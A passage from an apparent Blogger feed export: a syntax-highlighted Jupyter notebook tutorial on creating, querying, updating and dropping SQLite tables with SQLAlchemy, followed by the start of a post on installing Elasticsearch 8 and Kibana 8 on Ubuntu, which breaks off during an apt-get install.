<span style="color: #ffffff">securitynik_db_engine</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">create_engine(</span><span style="color: #0086d2">'sqlite:///securitynik-db.sqlite'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">echo=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">print(securitynik_db_engine)</span>
<span style="color: #0086d2">''' </span>
<span style="color: #0086d2">Setup the metadata</span>
<span style="color: #0086d2">Quoting from the sqlalchemy manual: "The MetaData is a registry which includes the ability to emit a limited set of schema generation commands to</span>
<span style="color: #0086d2">the database"</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">metadata</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">MetaData()</span>
<span style="color: #ffffff">print(metadata)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[4]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the engine created. Time to make a connection to the database</span>
<span style="color: #0086d2">Since the database securitynik-db.sqlite does not exist,</span>
<span style="color: #0086d2">the file will be created on the file system</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">securitynik_db_engine.connect()</span>
<span style="color: #ffffff">securitynik_db_connection</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[5]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Verifying the securitynik-db.sqlite file has been created on the file system</span>
<span style="color: #0086d2">and that it is currently empty, as no data has been written to it</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">get_ipython().system(</span><span style="color: #0086d2">'dir securitynik-db.sqlite'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[6]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the file now created. Time to create some tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create an employee Table</span>
<span style="color: #ffffff">employee_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'employees'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'EmployeeID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'FName'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'LName'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Active'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Boolean(),</span> <span style="color: #ffffff">default=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'securitynik.com employee'</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[7]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Create a blogs table</span>
<span style="color: #0086d2">Setup the blogger_id field to link back to the EmployeeID field in the employees table</span>
<span style="color: #0086d2">Note, could have also used foreign_key(employee_table.columns.EmployeeID to setup the foreign key</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">blogs_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'blogs'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'BlogID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'blogger_id'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">ForeignKey(</span><span style="color: #0086d2">'employees.EmployeeID'</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'BlogTitle'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Blogger'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'Nik Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Date'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">DateTime(),</span> <span style="color: #ffffff">nullable=datetime.now),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'URL'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Text(),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'Blog post created by Nik Alleyne'</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[8]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create a table other</span>
<span style="color: #ffffff">other_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'other'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'ID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[9]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create all the above defined tables</span>
<span style="color: #ffffff">metadata.create_all(securitynik_db_connection)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[10]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Verifying the tables were successfully created by viewing the metadata object</span>
<span style="color: #ffffff">metadata.tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[11]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Taking a different view of the tables via metadata</span>
<span style="color: #ffffff">metadata.sorted_tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[12]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the tables created time to insert data</span>
<span style="color: #0086d2">first into the employees table.</span>
<span style="color: #0086d2">I will first insert 1 record</span>
<span style="color: #0086d2">At the same time, return the number of rows impacted via the rowcount</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(employee_table).values(FName=</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">LName=</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Active=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Comments=</span><span style="color: #0086d2">'Blog Author'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[13]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Add an entry to the blog table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(blogs_table).values(blogger_id=</span><span style="color: #0086f7; font-weight: bold">1</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">BlogTitle=</span><span style="color: #0086d2">'Beginning SQLAlchemy'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">URL=</span><span style="color: #0086d2">'http://www.securitynik.com/beginning-sql-alchemy.html'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[14]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Insert some data into the other table</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(other_table).values(Comments=</span><span style="color: #0086d2">'Nothing Exciting'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[15]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Now that I can assign 1 value at a time</span>
<span style="color: #0086d2">time to insert multiple values via a list of </span>
<span style="color: #0086d2">dictionaries</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">add_multiple_employees</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">[</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'S'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Khan'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Admin'</span><span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'TQ'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'G'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Manager'</span><span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'T'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'A'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'D'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Maintainer'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'J'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'S'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Contributor'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'C'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Comments Admin'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'A'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'W'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">]</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the list of dictionaries built, time to submit to the database</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># At the same time, get the number of rows impacted</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(employee_table,</span> <span style="color: #ffffff">add_multiple_employees)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[16]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Trying another strategy to get users into the database</span>
<span style="color: #0086d2">In this case, read data from a CSV file and push int into the datbase</span>
<span style="color: #0086d2">First read the csv file with pandas and print the first 5 records</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_employees</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">pd.read_csv(</span><span style="color: #0086d2">'employees.csv'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">header=</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">sep=</span><span style="color: #0086d2">','</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">df_employees.head(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[17]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the dataframe now containing the CSV data</span>
<span style="color: #0086d2">time to take the dataframe data and push it into the SQLite database</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_employees.to_sql(name=</span><span style="color: #0086d2">'employees'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">con=securitynik_db_connection,</span> <span style="color: #ffffff">if_exists=</span><span style="color: #0086d2">'append'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">index=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[18]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With no errors above, it looks like all is well</span>
<span style="color: #0086d2">Using the same strategy to add new blog entries</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_blogs</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">pd.read_csv(</span><span style="color: #0086d2">'blogs.csv'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">header=</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">sep=</span><span style="color: #0086d2">','</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">df_blogs.head(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[19]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the dataframe now containing the CSV data</span>
<span style="color: #0086d2">time to take the dataframe data and push it into the SQLite database</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_blogs.to_sql(name=</span><span style="color: #0086d2">'blogs'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">con=securitynik_db_connection,</span> <span style="color: #ffffff">if_exists=</span><span style="color: #0086d2">'append'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">index=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[20]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2"> With the data added to the various coluimns</span>
<span style="color: #0086d2"> Time to now query the various tables</span>
<span style="color: #0086d2"> Select the first 5 records from the employees table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">result_proxy</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table)).fetchall()</span>
<span style="color: #ffffff">result_proxy</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[21]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># How many records are there in the Employees table</span>
<span style="color: #ffffff">len(result_proxy)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[22]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Get a sample result Key</span>
<span style="color: #ffffff">result_proxy[</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">].keys()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[23]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the result key, iterate through the results</span>
<span style="color: #ffffff">print(</span><span style="color: #0086d2">'EmployeeID | FName | LName | Active | Comments '</span><span style="color: #ffffff">)</span>
<span style="color: #fb660a; font-weight: bold">for</span> <span style="color: #ffffff">result</span> <span style="color: #ffffff">in</span> <span style="color: #ffffff">result_proxy:</span>
<span style="color: #ffffff">print(f</span><span style="color: #0086d2">'{result.EmployeeID} | {result.FName} | {result.LName} | { result.Active } | {result.Comments}'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[24]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Building on the query, adding a where clause</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[25]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Building on the above query, taking advantage of 'and_'</span>
<span style="color: #0086d2">to compound the query.</span>
<span style="color: #0086d2">Leveraging both .columns and .c </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(and_(</span>
<span style="color: #ffffff">employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.FName==</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.Active==</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">))).fetchone()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[26]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Taking advantage of 'or_'</span>
<span style="color: #0086d2">to compound the query.</span>
<span style="color: #0086d2">Leveraging both .columns and .c </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(or_(</span>
<span style="color: #ffffff">employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.FName==</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.Active==</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">))).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[27]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Looking at columns in the blog table </span>
<span style="color: #0086d2">identif all records where the URL field is null</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.URL==</span><span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[29]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Looking for all records where the URL is not NULL in the blogs table </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.URL!=</span><span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[32]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Finding records using Like</span>
<span style="color: #0086d2">Looking specifically for records where the name is like kibana</span>
<span style="color: #0086d2">Note I am ignorning the case by using iLike</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.BlogTitle.ilike(</span><span style="color: #0086d2">'%Kibana%'</span><span style="color: #ffffff">))).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[46]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Revisiting the employee table </span>
<span style="color: #0086d2">ordering by Employee FName</span>
<span style="color: #0086d2">Do it descending, as in going from Z to A rather than A to Z</span>
<span style="color: #0086d2">Limit the results to 5 records</span>
<span style="color: #0086d2">Only return the employee first and last name</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table.columns.FName,</span> <span style="color: #ffffff">employee_table.c.LName).order_by(desc(employee_table.columns.FName)).limit(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)).fetchall()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[55]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Updating records where comments is empty in the blog table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(update(blogs_table).where(blogs_table.c.Comments</span> <span style="color: #ffffff">==</span> <span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">).values(Comments=</span><span style="color: #0086d2">'SecurityNik is the blogger'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[57]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Verifying the change was made on the blog table</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table.columns.Comments)).fetchall()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[60]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Delete the records we just created above</span>
<span style="color: #ffffff">securitynik_db_connection.execute(delete(blogs_table).where(blogs_table.c.Comments</span> <span style="color: #ffffff">==</span><span style="color: #0086d2">'SecurityNik is the blogger'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[64]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Drop the other table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f">#other_table.drop(securitynik_db_engine)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[ ]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Drop all tables</span>
<span style="color: #ffffff">metadata.drop_all(securitynik_db_engine)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[28]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">References:</span>
<span style="color: #0086d2">https://campus.datacamp.com/courses/introduction-to-relational-databases-in-python</span>
<span style="color: #0086d2">https://www.sqlalchemy.org/library.html</span>
<span style="color: #0086d2">https://buildmedia.readthedocs.org/media/pdf/sqlalchemy/rel_1_0/sqlalchemy.pdf</span>
<span style="color: #0086d2">https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm</span>
<span style="color: #0086d2">https://www.topcoder.com/thrive/articles/sqlalchemy-1-4-and-2-0-transitional-introduction</span>
<span style="color: #0086d2">https://overiq.com/sqlalchemy-101/installing-sqlalchemy-and-connecting-to-database/</span>
<span style="color: #0086d2">'''</span>
</pre></td></tr></table></div>
Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-34044229570383948882022-04-07T09:02:00.002-07:002022-04-07T09:02:44.843-07:00Installing & configuring Elasticsearch 8 and Kibana 8 on Ubuntu<p>In a <a href="https://www.securitynik.com/2020/10/security-on-cheap-beginning-elastic.html" target="_blank">previous post</a>, we installed Elastic 7.1x. In this post, we are installing the new shiny toy from Elastic, Elastic 8.1</p><p>First up, install Elastic public signing key. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Install the apt-transport-https package</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get install apt-transport-https</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../apt-transport-https_2.0.6_all.deb ...</span>
<span style="color: white;">Unpacking apt-transport-https (2.0.6) ...</span>
